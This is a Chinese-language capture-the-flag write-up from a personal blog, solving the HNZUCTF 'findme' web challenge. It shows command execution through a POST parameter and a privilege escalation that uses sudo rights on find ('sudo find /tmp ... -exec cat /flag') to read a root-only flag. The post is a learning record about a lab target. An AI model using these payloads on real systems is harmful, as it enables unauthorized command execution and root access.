HNZUCTF findme
HNZUCTF findme
这次参加了杭师范的CTF比赛,来感受一下别人家的校赛web题,java和nodejs都不是很会,只能做做第一题,我还是太菜了()。算了,来看看题:
那就用hackbar直接post一个shit=1看看效果:
执行文件的路径不存在?既然这么说了直接看看根目录
shit=/bin/ls /
里面有flag,直接cat一下发现没有权限(果然没那么简单),那么接下来就要提权
看到根目录里面还有个start.sh,打开看看
shit=/bin/cat /start.sh
这个文件会在docker容器创建的时候运行,看来是个切入点,交给chatgpt看看,它这么说
1 | 这个脚本创建了一个名为“ctf”的新用户,然后将该用户添加到sudoers文件中, |
果然是切入点,既然find有管理员权限就用find来提权。果然拿到了管理员权限。
shit=usr/bin/sudo find /tmp -name "随便一个tmp里的文件" -exec whoami \;
然后就是直接cat /flag了
shit=usr/bin/sudo find /tmp -name "随便一个tmp里的文件" -exec cat /flag \;
这次比赛,虽然我写出的题目不多,但收获还是很多的,杭师范的题目中docker,java后端,nodejs都比较接近于现实开发,其中漏洞也是根据现实生活中存在的漏洞来的。这也更让我明白如果不掌握正向的开发的话,逆向的安全也无从谈起。我作为一个对安全比较感兴趣的开发专业的学生,在掌握开发之前就接触了很多安全漏洞,实际上这只是是浮于表面的。所以今后我也会更加注重对开发的学习,先正向后逆向。
本博客所有文章除特别声明外,均采用 CC BY-NC-SA 4.0 许可协议。转载请注明来自 Vidocq's Blog!